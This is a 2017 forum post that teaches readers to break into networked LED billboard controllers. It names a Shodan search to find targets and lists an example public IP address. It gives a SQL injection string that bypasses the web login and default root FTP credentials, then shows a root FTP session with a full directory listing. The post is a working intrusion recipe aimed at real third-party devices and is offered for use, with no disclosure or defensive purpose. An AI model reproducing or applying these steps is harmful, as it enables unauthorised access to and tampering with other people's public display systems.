Terry.Crews Posted February 2, 2017 Report Posted February 2, 2017 (edited) Step 1. Register to shodan Step 2. Look up: title:"lednet live system" You'll find some! Example: 186.206.188.175:8060/en/main.html How to hack it? Well the Username Parameter is vulnerable to SQL Injection...... So to login, paste -1558" OR 9005=9005 AND "UxGI"="UxGI in the username parameter and anything in the password input. Now click login! Also another vulnerability is a default password vuln. You can basically get root ftp access to all of these billboards.... Username: root Password: 111111 $ ftp 186.206.188.175 Connected to 186.206.188.175. 220 Welcome to blah FTP service. Name (186.206.188.175): root 331 Please specify the password. Password: 230 Login successful. Remote system type is UNIX. Using binary mode to transfer files. ftp> cd / 250 Directory successfully changed. ftp> ls 229 Entering Extended Passive Mode (|||41314|). 150 Here comes the directory listing. drwxr-xr-x 1 0 0 1464 Jan 01 1970 bin lrwxrwxrwx 1 0 0 21 Jan 01 1970 c: -> /usr/local/playdata/c lrwxrwxrwx 1 0 0 21 Jan 01 1970 d: -> /usr/local/playdata/d drwxr-xr-x 7 0 0 0 May 21 18:08 dev lrwxrwxrwx 1 0 0 21 Jan 01 1970 e: -> /usr/local/playdata/e drwxr-xr-x 1 0 0 748 Jan 01 1970 etc lrwxrwxrwx 1 0 0 21 Jan 01 1970 f: -> /usr/local/playdata/f drwxr-xr-x 1 0 0 36 Jan 01 1970 home drwxr-xr-x 1 0 0 1868 Jan 01 1970 lib lrwxrwxrwx 1 0 0 11 Jan 01 1970 linuxrc -> bin/busybox drwxr-xr-x 1 0 0 32 Jan 01 1970 mnt drwxr-xr-x 1 0 0 0 Jan 01 1970 opt dr-xr-xr-x 51 0 0 0 Jan 01 1970 proc drwxr-xr-x 1 0 0 116 Jan 01 1970 root drwxr-xr-x 1 0 0 1332 Jan 01 1970 sbin drwxr-xr-x 12 0 0 0 Jan 01 1970 sys drwxrwxrwt 6 0 0 720 May 21 18:16 tmp drwxr-xr-x 1 0 0 108 Jan 01 1970 usr drwxr-xr-x 3 0 0 672 Jan 01 1970 var drwxr-xr-x 4 0 0 288 Jan 01 1970 www 226 Directory send OK. ftp> Copiat de le HF... Edited February 2, 2017 by Terry.Crews 2 Quote
